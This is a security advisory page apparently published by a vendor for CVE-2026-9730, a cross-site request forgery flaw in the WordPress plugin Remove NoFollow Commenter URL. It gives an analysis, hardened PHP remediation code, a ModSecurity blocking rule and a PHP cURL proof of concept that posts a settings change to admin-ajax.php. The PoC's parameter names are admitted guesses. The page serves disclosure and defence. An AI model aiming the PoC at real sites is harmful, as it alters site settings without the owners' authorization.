Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 2, 2026

CVE-2026-9730: Remove NoFollow Commenter URL <= 1.0 Cross-Site Request Forgery to Settings Update PoC, Patch Analysis & Rule

CVE ID CVE-2026-9730
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.0
Patched Version
Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9730 (metadata-based): This vulnerability affects the Remove NoFollow Commenter URL plugin for WordPress, version 1.0. It is a Cross-Site Request Forgery (CSRF) issue with a CVSS score of 4.3, allowing unauthenticated attackers to modify the plugin’s comment-display setting by tricking a site administrator into performing an action.

The root cause is missing or incorrect nonce validation on the gmz_comment_settings_save function. In WordPress, admin actions typically require a nonce to verify that requests are intentional from the administrator. Without this nonce check, the function accepts any POST request, regardless of origin. This inference is based on the CWE classification (CWE-352) and the vulnerability description. No code diff is available to confirm the exact implementation.

Exploitation requires an attacker to craft a forged request targeting the plugin’s settings save handler. The likely endpoint is a WordPress admin-ajax.php action with the action parameter set to gmz_comment_settings_save or a similar handler. The attacker would embed a malicious HTML form or image tag in an external site, which, when visited by a logged-in administrator, submits the request and changes the plugin settings. The payload would include parameters such as ‘comment_display’ or similar setting field names.

Remediation involves adding a nonce verification check to the gmz_comment_settings_save function using WordPress’s check_ajax_referer() or wp_verify_nonce() functions. Plugins should validate the nonce before processing any state-changing requests. Additionally, capability checks should ensure the user has administrative privileges.
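As an added illustration of that remediation (example code written for this page, not the plugin's own source, which the advisory does not show), the handler below is reconstructed in the shape the analysis describes, first without a nonce check and then hardened with check_ajax_referer() plus a capability check, together with the settings form that emits the matching nonce. The function name gmz_comment_settings_save comes from the advisory and comment_display is the parameter name it infers; the option name gmz_comment_display, the nonce action gmz_comment_settings, the field name gmz_nonce and the manage_options capability are assumptions, and the code assumes it runs inside WordPress as plugin code.

```php
<?php
/*
 * Added example (not the plugin's code): an admin-ajax.php settings handler
 * in the CSRF-prone shape the advisory describes, beside its hardened form.
 * Names marked "assumed" are not taken from the advisory.
 */

// --- BEFORE: the CWE-352 pattern. Not hooked here, shown for contrast. ---
// A wp_ajax_ handler runs only for logged-in users, so the forged request
// relies on the administrator's browser attaching its session cookie.
// Nothing proves the administrator intended the request, so a form on an
// external site is accepted exactly like a click in the settings page.
function gmz_comment_settings_save_unprotected() {
    $display = isset( $_POST['comment_display'] ) ? '1' : '0';
    update_option( 'gmz_comment_display', $display ); // option name assumed
    wp_send_json_success( array( 'comment_display' => $display ) );
}

// --- AFTER: nonce and capability checks before any state change. ---------
function gmz_comment_settings_save() {
    // 1. Nonce: ties the request to a form this site rendered for this
    //    user. On failure check_ajax_referer() ends the request (HTTP 400,
    //    body "-1"), so nothing below runs. Action/field names assumed.
    check_ajax_referer( 'gmz_comment_settings', 'gmz_nonce' );

    // 2. Capability: a valid nonce only proves origin, not authority.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Only then read, unslash and normalise the submitted value.
    $raw     = isset( $_POST['comment_display'] )
        ? sanitize_text_field( wp_unslash( $_POST['comment_display'] ) )
        : '0';
    $display = ( '1' === $raw ) ? '1' : '0';

    update_option( 'gmz_comment_display', $display ); // option name assumed
    wp_send_json_success( array( 'comment_display' => $display ) );
}
// Authenticated users only: deliberately no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_gmz_comment_settings_save', 'gmz_comment_settings_save' );

// --- The settings form must carry the nonce the handler verifies. --------
function gmz_comment_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
        <input type="hidden" name="action" value="gmz_comment_settings_save">
        <?php wp_nonce_field( 'gmz_comment_settings', 'gmz_nonce' ); ?>
        <label>
            <input type="checkbox" name="comment_display" value="1"
                <?php checked( '1', get_option( 'gmz_comment_display', '1' ) ); ?>>
            Show commenter URLs
        </label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

The order of the checks matters: the nonce check runs first so that a forged request is rejected before any capability lookup or option write, and the capability check is kept even though the nonce already passed, because a nonce only shows the request came from this site's own page, not that the user is allowed to change settings. The form posts straight to admin-ajax.php for brevity; a plugin that submits via JavaScript would pass the same nonce value (from wp_create_nonce()) in the request body.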

The impact is limited to integrity: an attacker can change the plugin’s comment-display setting (e.g., hiding or showing commenter URLs). This could be used as part of a broader social engineering attack but does not directly expose data or allow privilege escalation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-9730 (metadata-based)
# Blocks CSRF exploitation of the Remove NoFollow Commenter URL plugin settings save handler
# Blocks POST requests to admin-ajax.php with the vulnerable action parameter
# Note: at the WAF a forged request is indistinguishable from an administrator's own save,
# so this rule also blocks legitimate changes to the setting; treat it as a stop-gap until
# the plugin verifies a nonce. Requires SecRequestBodyAccess On so ARGS_POST is populated.
# REQUEST_FILENAME is matched (path only) because REQUEST_URI would also include any query
# string appended to the URL.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20269730,phase:2,deny,status:403,chain,msg:'CVE-2026-9730: Remove NoFollow Commenter URL plugin CSRF (metadata-based)',severity:'CRITICAL',tag:'CVE-2026-9730'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:action "@streq gmz_comment_settings_save" \
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9730 - Remove NoFollow Commenter URL <= 1.0 - Cross-Site Request Forgery to Settings Update

// Configuration: set the target WordPress site URL
$target_url = 'http://example.com'; // CHANGE THIS

// The vulnerable AJAX action (inferred from plugin slug and description)
$ajax_action = 'gmz_comment_settings_save';
// Inferred parameter name for the comment display setting (commonly named 'comment_display' or similar)
$setting_value = '1'; // 1 = enable display, 0 = disable, adjust as needed

// Construct the POST data (nonce is not required due to missing verification)
$post_data = array(
    'action' => $ajax_action,
    'comment_display' => $setting_value
);

// Initialize cURL session
// Note: a direct request like this carries no WordPress login session, so it
// only shows what the endpoint accepts from an anonymous caller; the CSRF path
// described above runs inside an administrator's browser.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // for testing with self-signed SSL

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Display results
echo "HTTP Status Code: " . $http_code . "\n";
echo "Response body: " . $response . "\n";
?>
